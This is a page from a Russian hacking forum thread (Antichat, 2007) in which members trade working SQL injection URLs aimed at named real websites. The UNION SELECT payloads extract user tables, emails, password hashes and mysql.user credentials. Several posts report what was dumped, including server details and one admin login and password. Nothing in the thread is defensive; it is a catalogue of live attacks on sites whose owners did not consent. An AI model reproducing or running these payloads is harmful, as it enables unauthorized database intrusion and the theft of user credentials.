ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2201  
Старый 15.05.2007, 16:12
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

+1 - 5 версия.
Вывод данных:

Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(nickname,char(58),email,char(58),passwd),3%20from%20forum_users/*
Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user_login,char(58),user_email,char(58),user_pass),3%20from%20users_ru/*
Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat_ws(char(58),absnum,level,position,name,alias,approved,description),3%20from%20admins/*
 
Ответить с цитированием

  #2202  
Старый 15.05.2007, 16:43
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Цитата:
Сообщение от [53x]Shadow  
Все там с выводом, глаза разуйте, или посмотрите чуть выше пост крота!
Если запрос:
Код:
http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,2,3/*
То на странице:
Народная оппозиция 2 - это и есть вывод!
Сорри, затупил. С кем не бывает?
 
Ответить с цитированием

  #2203  
Старый 15.05.2007, 16:43
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://mp3-portal.p8.ru/showlyric.php?id=-1'+union+select+1,2,convert(concat(user,0x3a,password)+using+cp1251),4,5,6,7+from+mysql.user/*&char=193
хеши mysql-5, версия 4.1* =)
 
Ответить с цитированием

  #2204  
Старый 15.05.2007, 19:37
lol2006
Познающий
Регистрация: 25.05.2006
Сообщений: 87
Провел на форуме:
539233

Репутация: 44
По умолчанию

Вот
Код:
http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*
Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!
 
Ответить с цитированием

  #2205  
Старый 15.05.2007, 21:17
dadunnnt
Новичок
Регистрация: 16.02.2006
Сообщений: 24
Провел на форуме:
94166

Репутация: 14
Отправить сообщение для dadunnnt с помощью ICQ
По умолчанию

Цитата:
Сообщение от lol2006  
Вот
Код:
http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*
Вроде 4, а че дальше так и невкурил (я новичек)! Мож кто продолжит)!

Цитата:
http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4,DATABASE(),6 ,7,8,9,10,11,12/*
USER() : rossorig_superus@localhost
VERSION() : 4.0.27-log
DATABASE() : rossorig_agbook1
 
Ответить с цитированием

  #2206  
Старый 16.05.2007, 05:06
Gorn
Новичок
Регистрация: 25.10.2006
Сообщений: 13
Провел на форуме:
158978

Репутация: 34
По умолчанию

Вот, погуглил немного:
Код:
http://www.tectonic.co.za/view.php?id=99999999+union+select+1,concat(char(39,60,104,51,62,39),username,0x3a,password,0x3a,email),3,4+from+users
http://intercar.com.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users
http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,3,4
http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,2,3,4,5,6
Здесь админку не могу найти. Есть cpanel, тока к нему не подходит =\
Код:
http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users&lng=ua
user: admin
pass: repz
Если что-то уже было - ссори за боян

Последний раз редактировалось Gorn; 16.05.2007 в 05:22..
 
Ответить с цитированием

  #2207  
Старый 16.05.2007, 08:37
sob@ke
Banned
Регистрация: 30.12.2006
Сообщений: 37
Провел на форуме:
228136

Репутация: 4
Отправить сообщение для sob@ke с помощью ICQ
По умолчанию

http://www.dancenter.ru/articals.php?id=30'

Последний раз редактировалось sob@ke; 16.05.2007 в 08:39..
 
Ответить с цитированием

sql-inj
  #2208  
Старый 16.05.2007, 11:56
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql-inj

www.razvod.ru (4)
phpbb_users (username, user_password, etc.)
Цитата:
http://www.razvod.ru/woman.php?id=-597+union+select+1,2,3,concat_ws(0x3a,user_id,user name,user_password,user_email),5,6,7,8,9+from+phpb b_users+limit+0,1/*
ps sob@ke
Цитата:
http://www.dancenter.ru/articals.php?id=30'
уже было
 
Ответить с цитированием

  #2209  
Старый 16.05.2007, 12:52
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

Код:
http://www.minton.com.tr/html/urun.asp?urun=456465+union+select
есть такая фирма у турок: Minton называется гы. Не смог тейбл подобрать
 
Ответить с цитированием

  #2210  
Старый 16.05.2007, 15:29
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.bonus.ru/video/index.phtml?film_id=999999999+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11/*
-------------

Код:
http://film.topd.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(database(),char(58),user(),char(58),version()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
-------------

Код:
http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11,12/*
http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(user,char(58),password),char),4,5,6,7,8,9,10,11,12+from+mysql.user/*
-------------

Код:
http://www.natc.ru/clubs/forsazh/paper/?view=true&id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10,11,12,13,14/*
-------------

Код:
http://teo.poliglos.info/main.php?id='+union+select+concat(database(),char(58),user(),char(58),version())/*
Интересных таблиц не нашел:

Код:
http://teo.poliglos.info/main.php?id='+union+select+table_name+from+information_schema.tables+limit+45,1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ